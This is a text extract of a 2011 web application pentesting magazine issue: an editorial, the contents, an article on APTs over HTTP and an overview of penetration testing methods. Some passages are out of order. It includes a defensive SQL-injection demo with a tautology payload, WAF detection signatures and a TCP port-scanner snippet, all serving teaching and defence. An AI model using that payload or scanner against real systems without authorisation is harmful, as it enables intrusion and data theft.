Web App Pen Testing 01/2011
http://pentestmag.com 01/2011 (1) November
ADVANCED PERSISTENT THREATS
The Significance of HTTP and the Web for Advanced Persistent Threats
by Matthieu Estrade
The means used to achieve an APT are often substantial and proportional to the criticality of the targeted data, notes Matthieu Estrade. The author argues that APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run. The security of an application infrastructure begins at the conception stage and requires basic rules to be respected in order to simplify security operations. Real-life experience of application management highlights the difficulties in implementing all the good practices. Read the article to find out just how important APTs are.
WEB APP SECURITY
Web Application Security and Penetration Testing
by Bryan Soliman
The author shows the importance of penetration testing in web application security. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase. Automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications.
Developers are from Venus, Application Security guys from Mars
by Paolo Perego
We know that Application Security people speak a different language than developers do, whether we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group, yet the two teams must interact with each other to reach the same goal of building secure code. Paolo Perego shows in his article how difficult the communication between these two groups is.
WEB APP VULNERABILITIES
Pulling Legs of Arachni
by Herman Stevens
Herman Stevens gives us an in-depth analysis of Arachni, a fire-and-forget (point-and-shoot) web application vulnerability scanner developed
EDITOR'S NOTE
Web Application Security and Vulnerabilities
Have you ever wondered how important the security of web applications is for IT security?
The brand new November issue of Web App Pentesting magazine will attempt to provide you with some answers. This issue features information about web application security and vulnerabilities. For the first time, we would like to present the penetration testing topic from the web application's point of view, with articles about how important pentesting is in web application security. We gathered very good articles from different sources to give you a deep insight into this matter.
In the November issue you will find a very good article on the significance of the HTTP protocol and the Web for Advanced Persistent Threats, written by Matthieu Estrade. He shows us the importance of APT attacks. The article is an exhaustive mini-guide to APTs and to how particular threats can be defined as APTs. Turn to page 6 to find out more about APTs.
Go to pages 12-21 to read the articles about web application security. The first article, written by Bryan Soliman, covers Web Application Security and Penetration Testing. He introduces you to the nature of pen testing for web applications. I think that most of you will find this article a very useful and informative overview. Just read page 12.
Web Application Vulnerabilities: two great articles cover important aspects of this matter. I would like to introduce you to Herman Stevens' article Pulling Legs of Arachni, an analysis of the Arachni web application vulnerability scanner. More on page 22. The second article worth reading is XSS, BeeF, Metasploit Exploitation, written by Arvind Doraiswamy. The author describes Cross-Site Scripting in all its practical aspects; see page 30.
All the articles are very interesting and deserve to be marked as must-reads. As always, we thank the beta testers and proofreaders for their excellent work and dedication in helping to make this magazine even better. Special thanks to all the authors who helped me create this issue.
I would like to mention some supporters this time and thank Jeff Weaver, Daniel Wood and Edward Wierzyn for their help and great ideas. They work really hard to get the magazine out for you to read. I would also like to thank all the other helpers for their contributions to the magazine.
Last but not least, I would like to welcome Ryk Edelstain to our Advisory Board. Ryk has over 30 years of experience in IT security. As he describes himself: "I have a profound understanding of technology and the practices behind penetration testing. Although I work with other technical resources to handle the technical aspect of IT threat assessment, my training is in TSCM (Technical Surveillance CounterMeasures) for the detection and neutralization of both analogue and digital surveillance technologies. In fact, the practices and processes I have learned in TSCM parallel those of PT, where the environment is assessed, a strategy and process is defined, and a documented and methodical process is executed. Results are continually evaluated at each step, and as the environment is learned the process is refined and executed until the assessment is complete." Ryk will help us make PenTest even more worth reading.
Enjoy reading the new Web App Pentesting!
Katarzyna Zwierowicz
& Pentest team
TEAM
Editor: Katarzyna Zwierowicz katarzyna.zwierowicz@software.com.pl
Betatesters: Jeff Weaver, Daniel Wood, Edward Wierzyn, Davide Quarta
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trademarks presented in the magazine were used only for informative purposes. All rights to trademarks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathType™.
DISCLAIMER
The techniques described in our articles may only be used in private local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
in Ruby by Tasos "Zapotek" Laskos. Step by step, the author acquaints us with the process of installing and using the program, and also clearly shows us the advantages and disadvantages of Arachni.
XSS, BeeF, Metasploit Exploitation
by Arvind Doraiswamy
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code. In this article, Arvind Doraiswamy shows us how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeeF.
Cross-Site Request Forgery: In-Depth Analysis
by Samvel Gevorgyan
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user. Samvel Gevorgyan describes step by step how to deal with a CSRF vulnerability.
WEB APPS CHECKING
First the Security Gate, then the Airplane
by Olivier Wai
Olivier Wai tries to answer the question: "What needs to be heeded when checking web applications?" Any web application, old or new, needs to be secured by a Web Application Firewall (WAF) in full proxy mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
CONTENTS
ADVANCED PERSISTENT THREATS
The omnipresence of the Web is now a given, and it serves a wide variety of situations, as detailed in the non-exhaustive list below:
• Community applications
• Institutional Web sites
• Online transactions
• Business applications
• Intranet/Extranet
• Entertainment
• Medical data
• Etc.
In response to user requirements and developing needs, content driven by HTTP has become increasingly rich and dynamic. It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms: PC, Mac and mobile users all form part of the connected masses operating on their chosen platforms. But have these new privileges arrived without any underlying constraints?
The race towards sophistication has not been accompanied by similar developments in the security and reliability of data circulated across the Web. A concrete example is the fact that HTTP does not provide native support for sessions, and it is therefore difficult to be sure that requests received during browsing emanate from the same user. Large-scale use of the Web illustrates the discrepancy that exists in terms of security versus volume, and this inherent flaw has become a major IT system issue, making HTTP a preferred vector of attacks and data compromise.
Cybercriminals are aware of the exploitability of the Web and have made it their number one target. Not a week goes by without an organization being compromised via HTTP:
• PlayStation Network (Sony) -> WordPress version problem
• MySQL (Oracle) -> SQL Injection
• RSA (EMC) -> SQL Injection
• TJX -> SQL Injection
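The SQL injection incidents listed above all exploit queries built by string concatenation. A minimal illustration of the flaw and of the parameterized fix, using Python's built-in sqlite3 (table and data are invented for the example):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def lookup_unsafe(name):
    # Vulnerable: attacker input is spliced into the SQL text itself
    return conn.execute(
        "SELECT secret FROM users WHERE name = '%s'" % name).fetchall()

def lookup_safe(name):
    # Parameterized: the driver treats the input strictly as data
    return conn.execute(
        "SELECT secret FROM users WHERE name = ?", (name,)).fetchall()

payload = "x' OR '1'='1"
# lookup_unsafe(payload) returns every row in the table, because the
# injected OR clause is always true; lookup_safe(payload) returns nothing,
# since no user has that literal name.
```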
The above attacks, conceived and carried out with precise attention to logistics, are by no means an innovation, but we now refer to them differently, using the term APT (Advanced Persistent Threat).
Bolstered cyber-activity, the discovery of intrusions and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage, which in turn amplifies the impact on the image of the unfortunate victims, more often than not high-profile businesses or international organizations.
The Significance of HTTP and the Web for Advanced Persistent Threats
Initially created in 1989 by Tim Berners-Lee at CERN, the Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 – a mere time lapse of twenty-two years in the transmission of Web-based content.
The use of HTTP may be required because the different areas are often filtered, leaving only the necessary protocols open; HTTP is often left open to allow administrators to navigate through these machines or to update them.
To remain as stealthy as possible, a strategic backdoor to the web application or the application server will use HTTP as a direct connection and/or as a tunnel to other applications. During this movement it will not be filtered, and no attention will be drawn to a process that opens a port unknown to the system.
Bounce Mechanisms
Whenever changes occur within an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages because it is predominantly active and open between the different areas:
• Dialogue between server applications
• Web Services
• Web Administration Interface
• Etc.
It often happens that security policies contain the same weaknesses from one area to another:

• Exit ports opened
• Filtering omissions on higher-level ports
• Use of the same default passwords
Data Extraction
Once the crucial information is reached, it is necessary to quit the system as discreetly as possible, over a certain length of time. The HTTP protocol is often enabled for exit without being monitored, for several reasons:
• Machines are often updated using HTTP
• When an administrator logs on to a remote machine, he will often require access to a website
• Since these areas are often regarded as "safe" zones, restrictions are lower and controls less strict
What Protective Measures Can Be Deployed?
Application security has become a major issue in the business world. Whereas network security is fairly conventional and primarily leans on the filtering of destinations, sources, IPs and ports, in most cases application security is more complex and involves applications that are often unique, bespoke and
Anatomy of an APT
Advanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose: that of retrieving sensitive or critical data.
Several steps are necessary to reach the goal:

• The initial intrusion
• Continued presence within the IT system
• Bounce mechanisms and in-depth infiltration
• Data extraction
HTTP plays an important role during these attacks, firstly because it is predominantly present during the various stages, and furthermore because it is often the only available protocol that can serve as an attack vector.
The Initial Intrusion
The system is invaded by an attack focused on an area exposed to the public on the Internet. In the case of the Sony PlayStation Network, for instance, the intrusion took place via their blog, which used a vulnerable version of WordPress.
These days it is unusual for any organization to do without a website, which can range from basic and simple to complex and dynamic.
The website plays the role of a gateway that provides the initial point of entry into an infrastructure. It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack. In addition, depending on the application infrastructure, location and lack of compartmentalization, it is possible for a simple, scarcely-used application to be found near or on the same server as a business application. The attack will bounce from one to the other, and the business application will then become accessible and provide more access privileges.
Retrieval of information is often the vital issue during the bounce mechanism and extended infiltration into the system. Some examples of the data targeted:
• User passwords
• Hardware and network destinations -> discovery
• Connectors to other systems -> new protocols
• Etc.
Continued Presence
After the initial inroads into the structure, the next phase requires that presence within the system remains secure. The machine has to be re-accessed and exploited without arousing the suspicions of system administrators.
deployed with many more specifications relating to the infrastructure. Three steps are necessary to prevent or respond properly to an APT:
• Prevention
• Response
• Forensics
Prevention
Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.
Define a Secure Application Infrastructure: Partition the Network
This measure is one of the pillars of PCI-DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult for an attacker to reach sensitive data because of the large number of bounces required. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound.
Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately. Unfortunately, there are many systems, described as flat infrastructures, that contain a variety of applications housed in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.
Separation of Applications
Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:
• It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure.
• It enhances understanding of an attack, and by doing so facilitates the search for evidence, which will then be based on the criticality of the data and the complexity of the applications.
Anticipate Possible Outcomes
To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case it is necessary to predefine the tools and procedures for investigation and/or monitoring.
Risk Analysis and Attack Guidelines
This step allows a precise understanding of the risks, based on the data manipulated by the applications. It has to be carried out by studying the web applications, their operation and their business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.
Developer Training
Applications are commonly developed following specific business imperatives, often with the added stress of meeting availability deadlines. Developers do not place security high on their list of priorities, and it is often overlooked in the process.
However, there are several ways to significantly reduce risk:

• Raising developer awareness of application attacks
  • OWASP Top 10
  • WASC TC v2
• The use of libraries to filter input
  • Libraries are available for all languages
• Setting up audit functions, logs and traceability
• Accurate analysis of how the application works
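As an example of the "libraries to filter input" point above, most languages ship escaping helpers. In Python, the standard library's html.escape neutralizes markup before user input is echoed back into a page (the wrapper function here is illustrative):

```python
import html

def render_comment(user_input):
    """Escape user-supplied text before embedding it in an HTML page."""
    return "<p>" + html.escape(user_input) + "</p>"

# A script tag in the input is rendered inert:
# render_comment('<script>alert(1)</script>')
# -> '<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>'
```

Output escaping like this addresses reflected XSS; structured input (numbers, identifiers) should additionally be validated against an expected format.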
Regular Auditing: Code Analysis
You can resort to manual code analysis by an auditor, or to automated analysis using the available tools, to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful to detect vulnerabilities before going into production, and thus to fix them before they are exploited.
Unfortunately, this practice is only possible if you have access to the source code of the application; closed-source software packages cannot be analyzed this way.
Scanning and Penetration Testing
All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application, to determine the credentials necessary
for navigation, or the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).
These tests have to be repeated as often as possible, and whenever developers put a change to the application in place.
Appropriate Response
Traditional firewalls do not filter network application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS, by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content, and on the use of the protocol itself.
This type of deployment is often called defense in depth, and it has the ability to monitor the various attacks at both the application and network levels.
Last but not least, the association of the identity context with the security policy allows better detection of anomalies.
Traffic Filtering: The WAF (Web Application Firewall)
Web application firewalls can be considered an extension of network firewalls to the application level. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI-DSS.
Often used in reverse proxy mode, the WAF allows for a break in the protocol and facilitates the restructuring of zones between applications.
The WAFEC (Web Application Firewall Evaluation Criteria) document published by WASC is a useful guideline that helps in understanding and evaluating the different vendors as needed.
The WAF also helps to monitor and alert in case of threat, in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).
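The kind of inspection a WAF performs can be reduced to a toy rule engine: match request fields against attack signatures and, on a hit, block the request and record the source IP for the network firewall. The signatures and field names below are illustrative only; real WAF rule sets are far richer and context-aware.

```python
import re

# Toy signatures for common probe patterns
SIGNATURES = [
    re.compile(r"(?i)<script"),                # reflected XSS probe
    re.compile(r"(?i)\bunion\b.+\bselect\b"),  # SQL injection probe
    re.compile(r"\.\./"),                      # path traversal
]

BLOCKED_IPS = set()

def inspect(source_ip, query_string):
    """Return True if the request may pass, False if it is blocked."""
    if source_ip in BLOCKED_IPS:
        return False
    for sig in SIGNATURES:
        if sig.search(query_string):
            BLOCKED_IPS.add(source_ip)  # could be pushed to the network firewall
            return False
    return True
```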
Traffic Filtering: The WSF (Web Services Firewall)
The WSF is an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST.
XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, schemas).
Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures.
The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between two parties on the type of use (e.g. number of messages per day, data type, etc.). The WSF will also serve to monitor this function and to ensure that the SLA between the two parties is respected.
Authentication / Authorization
Applications use identities to control access to various resources and functions.
The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.
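The role-adapted whitelist described above can be sketched as a simple mapping from role to permitted resources, with everything else denied by default (role and path names are hypothetical):

```python
# Whitelist per role: anything not listed is denied by default
ROLE_WHITELIST = {
    "customer": {"/account", "/orders"},
    "support":  {"/account", "/orders", "/tickets"},
    "admin":    {"/account", "/orders", "/tickets", "/admin"},
}

def access_allowed(role, resource):
    """Deny by default; allow only resources whitelisted for the role."""
    return resource in ROLE_WHITELIST.get(role, set())
```

A request that falls outside the whitelist for its identity is itself an anomaly worth logging, not just blocking.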
Ensuring Continuity of Service
Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes.
However, some attacks based on weaknesses can have a devastating effect, being perpetrated to make the application unavailable and thereby provoke losses due to activity downtime.
To retaliate, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
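One common building block for blocking automated processes is per-client rate limiting; a minimal token-bucket sketch (the rate and capacity values are arbitrary examples):

```python
import time

class TokenBucket:
    """Allow roughly `rate` requests per second, with bursts up to `capacity`."""
    def __init__(self, rate, capacity):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill tokens in proportion to the time elapsed since the last call
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False
```

A scraper or DoS bot firing requests far faster than the refill rate exhausts the bucket immediately, while a human browsing at normal speed never notices the limiter.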
Operation / Monitoring
It is important to understand the use of the application during production, to monitor and detect abnormal behavior, and to make decisions accordingly:

• Blacklist
• Legal action
• Redirection to a honeypot
Log Correlation
Understanding abnormal behavior in an application helps in locating an attack.
An application infrastructure can comprise hundreds of applications. To understand the attack as a whole and monitor its changes (discovery, aggression, compromise), it is necessary to have a holistic view.
To do this, it is imperative to gather and correlate logs in order to obtain a real-time overall analysis and understand the threat mechanics:
• Mass attacks on a type of application
• Attacks targeting a specific application
• Attacks focused on a type of data
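Correlating logs across applications to surface patterns like those above can be sketched as grouping events by source and attack type. The event format here is an assumption; real pipelines normalize heterogeneous log lines first.

```python
from collections import Counter

# Each event: (source_ip, application, attack_type) - format assumed
events = [
    ("203.0.113.9", "shop",     "sqli"),
    ("203.0.113.9", "blog",     "sqli"),
    ("203.0.113.9", "intranet", "sqli"),
    ("198.51.100.4", "shop",    "xss"),
]

def attackers_hitting_many_apps(events, threshold=3):
    """Flag sources probing several applications: a mass-attack signature."""
    apps_per_source = {}
    for src, app, _ in events:
        apps_per_source.setdefault(src, set()).add(app)
    return [s for s, apps in apps_per_source.items() if len(apps) >= threshold]

def most_common_attack(events):
    """The dominant attack type hints at which data is being targeted."""
    return Counter(kind for _, _, kind in events).most_common(1)[0][0]
```

Seen in isolation, each application's log shows one probe; only the correlated view reveals a single source sweeping the whole infrastructure.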
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats.
Alerts will enable them to react and trigger procedures, either at the network level, by blocking the IP of the attacker, or at the application level, by forbidding access to resources or areas, or more directly by referral to a honeypot in order to analyze the behavior of the attacker.
Forensics
Understanding the Scope of an Attack
For each area compromised, it is important to understand what elements have been impacted and to trace the attack back to the roots of the intrusion and compromise: the installation of a backdoor, bounce mechanisms to other areas and/or extraction of data.
Analysis of Application Components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:
• Web server or application
• Database
• Directory
• Etc.
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application:
• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of Network Equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
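Checking for connections at unusual times, as suggested above, is easy to automate once access logs are parsed. This sketch flags logins outside an assumed 07:00-19:00 business window; the entry format and the window itself are assumptions to adapt to the environment.

```python
from datetime import datetime

def off_hours_logins(entries, start_hour=7, end_hour=19):
    """Return log entries whose timestamp falls outside business hours.

    `entries` is assumed to be a list of (iso_timestamp, user) pairs.
    """
    flagged = []
    for ts, user in entries:
        hour = datetime.fromisoformat(ts).hour
        if not (start_hour <= hour < end_hour):
            flagged.append((ts, user))
    return flagged
```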
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected in order to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all of these good practices. A comprehensive study of threats, an appropriate response and the anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on web reverse proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the open source Apache HTTP server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion and Flash.
These applications expose financial data, customer information and other sensitive, confidential data that requires authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level for such applications. With such critical data accessible from the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge and experience with a variety of different tools, and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication and code execution). A typical pen test involves the following procedures:
• Identification of Ports – ports are scanned and the associated running services are identified
• Software Services Analyzed – both automated and manual testing is conducted to discover weaknesses
• Verification of Vulnerabilities – this step helps verify that the vulnerabilities are real, and where a weakness might be exploited, to help remediate the issues
• Remediation of Vulnerabilities – the vulnerabilities are resolved and then re-tested to ensure they have been addressed
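The port-identification step above can be sketched with a plain TCP connect scan; the host and port list are up to the tester, and naturally this should only be run against systems you are authorized to test.

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Real scanners such as nmap add service fingerprinting, timing control and non-TCP scan types on top of this basic idea.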
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects, as well as the severity of any defects that do remain undetected, can be reduced or eliminated. Despite the fact that these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context, or make normative judgments about them, the struggle to find certain vulnerabilities will persist.
Web Application Security and Penetration Testing
In recent years, web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit the vulnerabilities to determine whether unauthorized access or other malicious activity is possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access (i.e. port 80 and port 443). Given the complexity of web applications and the tremendous amount of sensitive data that exists within them, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. Security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the countermeasures that need to be implemented are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:

• Automated process – where scanning tools or static analysis tools are used
• Manual process – where penetration testing or code review is used
Web application vulnerability types can be grouped into two categories:
Technical Vulnerabilities
Such vulnerabilities can be examined through tests for Cross-Site Scripting, Injection Flaws, and Buffer Overflows. Automated systems and tools that analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve this goal in the near future. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can be used to manipulate the logic of the application into performing tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows the manual pen tester to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to go directly from point A to point C, bypassing the security validation that exists at point B.
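The point A/B/C bypass described above can be illustrated with a minimal server-side check (a sketch; the names WORKFLOW and can_enter_step are hypothetical, not from any real framework):

```python
# Minimal sketch of the A -> B -> C workflow-bypass check described above.
WORKFLOW = ["A", "B", "C"]  # B is the security validation step

def can_enter_step(requested, completed):
    """Allow a step only if every earlier step was actually completed."""
    prerequisites = WORKFLOW[:WORKFLOW.index(requested)]
    return all(step in completed for step in prerequisites)

# A naive application that only checks the requested URL would let a user
# jump from A straight to C; the server-side check above does not:
assert can_enter_step("C", completed={"A", "B"}) is True   # legitimate flow
assert can_enter_step("C", completed={"A"}) is False       # bypass attempt blocked
```

An automated scanner has no notion of which step is "the validation", which is why spotting this class of flaw remains a manual task.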
History has proven that software bugs, defects, and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks, and application information. It has also been proven that most security breaches occur through vulnerabilities in the web application layer (i.e. attacks using the HTTP/HTTPS protocols). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analysts review the critical components of a web-based portal, e-commerce application, or web services platform. Part of this analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It's imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon an evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application, exposing those most likely to be exploited.
Figure 1 The different activities of the Pen Testing processes
Such assessments also allow testers to find similar instances of vulnerabilities throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, with access to the resources under test taking place remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. Testing processes used to achieve the security vulnerability assessment include Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment, and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment. Some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team does not have any inside information about the target environment, and the expected knowledge gained will be based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge of the environment under testing is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It's also important to point out that penetration testing can be achieved through two different types of testing:
• External Penetration Testing
• Internal Penetration Testing
Both types of testing can be conducted with no prior information (black box) or with full information about the target (white box).
Figure 2 The different phases of the Pen Testing
Figure 3 shows different procedures and steps that can be used to conduct the penetration testing. The following describes these steps:
• Scope and Plan – In this step, the scope of the penetration testing is identified and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning under the defined scope of the project is conducted: automated scanners examine the open ports and scan the system to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step, the testers prioritize the systems and the attack methods to be used based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using the automated tools is conducted: the attack methods designed in the previous phase are used to run the following tests: data and service pilferage, buffer overflow, privilege escalation, and denial of service (if applicable).
• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout pen testing, a specific structured methodology has to be followed, in which the following steps might be used: Enumeration, Vulnerability Assessment, and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
